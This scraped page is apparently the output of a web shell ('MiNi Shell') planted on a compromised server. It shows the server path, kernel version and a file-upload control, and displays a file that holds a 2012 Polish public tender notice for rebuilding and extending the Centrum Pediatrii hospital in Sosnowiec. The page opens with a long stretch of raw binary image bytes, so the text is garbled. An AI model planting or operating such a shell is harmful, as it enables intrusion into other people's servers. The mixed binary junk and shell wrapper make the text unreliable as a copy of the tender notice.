JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121016/401110-N-2012.html

<p class="kh_header"><b>Sosnowiec: na wykonanie robót budowlanych w ramach zadania pn. 
Przebudowa pomieszczeń Centrum Pediatrii  pod Oddział Gastroenterologiczny i Pracownię Endoskopii oraz Nadbudowa istniejącego budynku szpitalnego dla potrzeb nowego Oddziału Rehabilitacyjnego i Zakładu Rehabilitacji</b><br>
<b>Numer ogłoszenia: 401110 - 2012; data zamieszczenia: 16.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Centrum Pediatrii im. Jana Pawła II , ul. G. Zapolskiej 3, 41-218 Sosnowiec, woj. śląskie, tel. 032 2660230, 2660251, faks 032 2663630,2660251.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.centrum-pediatrii.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na wykonanie robót budowlanych w ramach zadania pn. 
Przebudowa pomieszczeń Centrum Pediatrii  pod Oddział Gastroenterologiczny i Pracownię Endoskopii oraz Nadbudowa istniejącego budynku szpitalnego dla potrzeb nowego Oddziału Rehabilitacyjnego i Zakładu Rehabilitacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych  wraz z instalacjami i uzyskanie  pozwolenia na użytkowanie zadania  składającego się z:

a Przebudowa pomieszczeń Centrum Pediatrii  pod Oddział Gastroenterologiczny i Pracownię Endoskopii,

b Nadbudowa istniejącego budynku szpitalnego dla potrzeb nowego Oddziału Rehabilitacyjnego i Zakładu Rehabilitacji.
W ramach zadania  pn. Przebudowa pomieszczeń Centrum Pediatrii  pod Oddział Gastroenterologiczny i Pracownię Endoskopii należy  wykonać  między innymi:

1.	roboty branży budowlanej polegające na:
a wykonaniu robót  rozbiórkowych :  rozebranie ścian i ścianek działowych, posadzek i sufitów podwieszonych, wykucie ościeżnic okiennych i drzwiowych, rozebranie ścian nośnych z osadzeniem belki stalowej,
b wykonaniu murów zewnętrznych i wewnętrznych: zamurowanie otworów drzwiowych, murowanie ścian nośnych , murowanie ścianek działowych,
c wykonaniu robót tynkarskich: tynki zwykłe, tynki suche gipsowe na rusztach stalowych, wykonanie gładzi gipsowych, pokrycie ścian płytkami,
d montażu stolarki okiennej i stolarki drzwiowej wraz z obróbką szpalet wewnętrznych,
e wykonaniu warstw podkładowych pod podłogi, pokrycie podłóg wykładziną i płytkami,     
które stanowią wierzchni element  warstw podłogowych,
f  wykonaniu robót malarskich,
g montażu sufitów  podwieszonych

2.	roboty branży  elektrycznej  w zakresie sieci, instalacji i urządzeń  elektrycznych,   
 instalacji teletechnicznych ( niskoprądowych) tj. sieci komputerowej i telefonicznej  sygnalizacji   
 p.poż, telewizji zbiorczej (RTV), instalacji przyzywowej:
 a polegające na demontażu istniejącej instalacji elektrycznej i teletechnicznej, tablic      
       rozdzielczych, opraw oświetleniowych, osprzętu,
 b polegające na wykonaniu instalacji oświetleniowej (oświetlenia ogólnego i awaryjnego),    
 instalacji gniazd wtykowych, instalacji zasilania odbiorów technologicznych, wentylacyjnych,   
 instalacji teletechnicznej, poprzez wykonanie tras kablowych w postaci bruzd, listew PCV,  
 ułożeniu ciągów rur i korytek kablowych, wraz zabudową nowych tablic piętrowych, ułożeniu  
 okablowania instalacji słaboprądowych wewnętrznych w budynku, montażu, uruchomieniu,  
 zaprogramowaniu i sprawdzeniu urządzeń instalacji słaboprądowych w budynku,
   
3.   roboty branży sanitarnej w zakresie instalacji wodno - kanalizacyjnych, centralnego   
       ogrzewania, wentylacji  mechanicznej nawiewno - wywiewnej, instalacji gazów medycznych    
       łącznie z panelami gazowymi polegających między innymi na wykonaniu  instalacji, montażu   
       armatury, prób instalacji,  izolacji termicznej rur, montażu przewodów zasilających  grzejniki    
       wraz z montażem  grzejników, wykonaniu podejść instalacji wod. - kan. pod projektowane   
       elementy wyposażenia sanitarnego, wykonaniu przewodów nawiewnych i wywiewnych dla  
       projektowanej instalacji wentylacji mechanicznej, przygotowanie zawiesi i podpór pod kanały  
       wentylacyjne, montażu kanałów wentylacyjnych z blachy ocynkowanej zgodnie Dokumentacją  
       projektową, zamurowanie i uszczelnienie wykonanych otworów budowlanych, rozruch i  
       regulacja  instalacji nawiewnej i wywiewnej, pomiary skuteczności i uciążliwości układu  
       wentylacji,  wykonaniu podejść pod projektowane odbiory gazów medycznych łącznie z   
       montażem paneli gazowych


Charakterystyczne parametry  techniczne 
	kubatura przebudowywanej  części                     2 060,40 m3
	powierzchnia  netto przebudowywanej  części      606,59 m2
	wysokość kondygnacji                                      3,65 m


W ramach  zadania  pn. Nadbudowa istniejącego budynku szpitalnego dla potrzeb nowego Oddziału Rehabilitacyjnego i Zakładu Rehabilitacji należy wykonać między innymi:

    1. roboty branży budowlanej polegające  między innymi na:
    a wykonaniu robót rozbiórkowych w zakresie  wykucia ościeżnic okiennych i drzwiowych,
     rozebranie ścian i ścianek działowych, rozebranie konstrukcji żelbetowych (schody, płyty),
     rozebranie posadzek z płytek, lastryka i parkietu, rozebranie ścian nośnych z osadzeniem   
     belki stalowej,
     b wykonaniu robót konstrukcyjnych polegających na: wykonaniu deskowań wraz   
     usztywnieniem,  układaniem i zagęszczaniem mieszanki betonowej, pielęgnacją betonu,
     c wykonaniu zbrojenia obejmującego elementy konstrukcyjne fundamentów, podpór, murów,         
     konstrukcje szkieletowe, płyty, belki i podciągi,
     d wykonaniu robót  murarskich,
     e wykonaniu konstrukcji i pokrycia dachowego wraz z obróbkami blacharskimi,
     f  wykonaniu robót tynkarskich,
     g montażu stolarki okiennej  oraz stolarki drzwiowej wraz z obróbką szpalet wewnętrznych,
     h wykonaniu pokrycia  podłóg płytkami(wykładziny, posadzki),które stanowią wierzchni   
     element  warstw   podłogowych, wykonaniu pokrycia ścian płytkami,
     i  wykonaniu robót malarskich,
     j  wykonaniu robót termomodernizacyjnych polegających na dociepleniu ścian zewnętrznych    
     budynku  wraz ze szpaletami,
     k wykonaniu izolacji podłóg i posadzek polegających na wykonaniu izolacji poziomych    
     cieplnych i  przeciwwilgociowych, wykonaniu warstw podkładowych pod podłogi, pokrycie     
      podłóg  wykładziną,
      l  montażu sufitów podwieszonych i ścianek działowych z płyt gipsowo- kartonowych,

2. roboty branży  elektrycznej  w zakresie sieci, instalacji i urządzeń  elektrycznych,   
    instalacji teletechnicznych ( niskoprądowych) tj. sieci komputerowej i telefonicznej     
sygnalizacji  p.poż, telewizji zbiorczej (RTV), instalacji przyzywowej polegające między innymi  na wykonaniu  tras kablowych w postaci bruzd, listew PCV, ułożeniu ciągów rur i korytek kablowych, ułożeniu okablowania instalacji słaboprądowych wewnętrznych w budynku, montażu, uruchomieniu, zaprogramowaniu i sprawdzeniu urządzeń instalacji słaboprądowych  w budynku,

 3. roboty branży sanitarnej w zakresie instalacji wodno - kanalizacyjnych, centralnego   
    ogrzewania, wentylacji  mechanicznej nawiewno - wywiewnej, instalacji gazów medycznych    
    polegających między innymi na wykonaniu  instalacji, montażu armatury, prób instalacji,    
    izolacji termicznej rur, montażu przewodów zasilających  grzejniki wraz z montażem   
    grzejników, przebudowa pionów kanalizacji sanitarnej, wykonaniu nowego pionu wody zimnej i  
    ciepłej z cyrkulacją, wykonaniu podejść instalacji wod. - kan. pod projektowane elementy  
    wyposażenia sanitarnego, wyprowadzeniu pionów wody na cele p.poż. z II kondygnacji budynku  
    do projektowanych pomieszczeń, wykonaniu przewodów nawiewnych i wywiewnych dla  
    projektowanej instalacji wentylacji mechanicznej, montażu elementów nawiewnych i   
    wywiewnych, montażu filtrów powietrza, montażu nagrzewnicy elektrycznej, montażu   
    wentylatora nawiewnego i wywiewnego, przygotowanie zawiesi i podpór pod kanały  
    wentylacyjne, montażu kanałów wentylacyjnych z blachy ocynkowanej zgodnie z Dokumentacją  
    projektową, zamurowanie i uszczelnienie wykonanych otworów budowlanych, rozruch i regulacja   
    instalacji nawiewnej i wywiewnej, pomiary skuteczności i uciążliwości układu wentylacji,  
    wykonaniu wpięcia w  przewody poziome rozprowadzające gazy medyczne w piwnicach,   
    wykonaniu nowego pionu gazów medycznych, wykonaniu podejść pod projektowane odbiory  
    gazów medycznych.

Charakterystyczne parametry  techniczne 

	powierzchnia zabudowy istniejąca                                            1249,00 m2  
	powierzchnia całkowita wewnętrzna   (segment I i II)                   1112,70 m2
                                                              
	powierzchnia netto  przebudowywanej części                              1170,12 m2
        kubatura  przebudowywanej części                                           3916,20 m3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.40-0, 45.11.12.91-4, 45.11.11.00-9, 45.11.10.00-8, 45.32.00.00-6, 45.26.24.10-8, 45.22.31.00-7, 45.26.23.00-4, 45.26.23.10-7, 45.11.12.20-6, 45.26.25.00-6, 45.41.00.00-4, 45.40.00.00-1, 45.42.11.00-5, 45.43.21.10-8, 45.44.22.00-9, 45.44.21.20-4, 45.30.00.00-0, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium do dnia 31.10.2012r.do godz. 8:00  w wysokości   230.000,00 PLN ( słownie: dwieście trzydzieści tysięcy zero groszy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca udokumentuje wykonanie ( zakończenie) w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej jedną robotę budowlaną polegającą na wykonaniu nowego obiektu budowlanego lub nadbudowie,  rozbudowie,  przebudowie  o wartości robót minimum 7.000.000,00 zł brutto, z podaniem  ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty  zostały wykonane    zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  Dokument  powinien być wystawiony przez Zamawiającego lub Generalnego Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże że:
 dysponuje między innymi:
      -  betoniarką samozasypową o pojemności bębna min  190 litrów   szt.1,
      -  wyciągiem towarowym o udźwigu min. 500kg  szt.1 
      -   rusztowaniem systemowym

Sprzęt ma być sprawny technicznie, odpowiadać przepisom dotyczącym jego użytkowania i spełniać normy ochrony środowiska.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponuje osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994r.Prawo budowlane /Dz.U.2003, nr 207, poz.2016 z późn. zm./
-	która będzie pełnić funkcję  kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez  żadnych ograniczeń oraz co  najmniej 5-letnie doświadczenie w pełnieniu funkcji kierownika budowy,

-   która będzie pełnić funkcję  kierownika robót, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalnościach: instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych, instalacji i urządzeń cieplnych, wentylacyjnych  bez żadnych ograniczeń oraz  co najmniej 3-letnie doświadczenie. 

-   która będzie pełnić funkcję  kierownika robót, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalnościach: instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez żadnych ograniczeń oraz  co najmniej 3-letnie doświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi:
Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  deliktowej i kontraktowej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia tj. posiada ubezpieczenie na kwotę  co najmniej 5.000.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron  wyrażoną na piśmie, pod rygorem nieważności takiej  zmiany w niżej  wymienionych przypadkach:
1.  Zmiany terminu realizacji:
a  z powodu  wystąpienia siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody ,
b z powodu niekorzystnych warunków atmosferycznych, z wyłączeniem warunków atmosferycznych typowych dla danej pory roku, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami( warunkami technicznymi-normami),
c konieczności udzielenia zamówienia  dodatkowego, niezbędnego  do prawidłowej realizacji przedmiotu umowy, a niemożliwego do przewidzenia w momencie udzielenia zamówienia o ile nie jest możliwe równoległe prowadzenie prac,
d  konieczność dostosowania dokumentacji projektowej do wiedzy technicznej.

2.   Zmiany ceny  ofertowej :
a   ustawowej zmiany stawki podatku  od towaru i usług VAT,
b  wystąpienia robót dodatkowych, przy czym wartość robót dodatkowych nie może przekroczyć 15% ceny kosztorysowej brutto,
c   wystąpienia robót zaniechanych.

3.  Zmiany sposobu realizacji przedmiotu umowy:
a niedostępności na rynku materiałów lub urządzeń wskazanych w ofercie, dokumentacji projektowej  spowodowanej zaprzestaniem ich produkcji lub wycofaniem z rynku. Zmiana ta nie może spowodować obniżenia parametrów technicznych.
b  pojawieniem się na rynku materiałów  lub urządzeń nowszej generacji, pozwalających na zaoszczędzenie kosztów realizacji lub kosztów eksploatacji,
c  konieczności zastosowania innych rozwiązań niż wskazanych w dokumentacji projektowej w sytuacji gdyby  zastosowanie przewidzianych rozwiązań groziło niewykonaniem  lub wadliwym wykonaniem przedmiotu umowy,
d  zmiany materiałów i urządzeń przedstawionych w ofercie przetargowej oraz producenta poszczególnych materiałów i urządzeń, pod warunkiem, że zmiana ta  nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.

4. Zmiany, o których mowa w pkt. 3 nie mogą powodować zmiany ceny ofertowej wykonania przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.centrum-pediatrii.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Pediatrii im. Jana Pawła II w Sosnowcu ul. G. Zapolskiej 3, 41-218 Sosnowiec, Dział Administracji, pokój O.35, w cenie 200 zł brutto płatne gotówką w kasie  lub przelewem w terminie do 7 dni..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2012 godzina 08:00, miejsce: Centrum Pediatrii im. Jana Pawła II w Sosnowcu, ul. G. Zapolskiej 3, 41-218 Sosnowiec, Dział Administracji, pokój O.35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com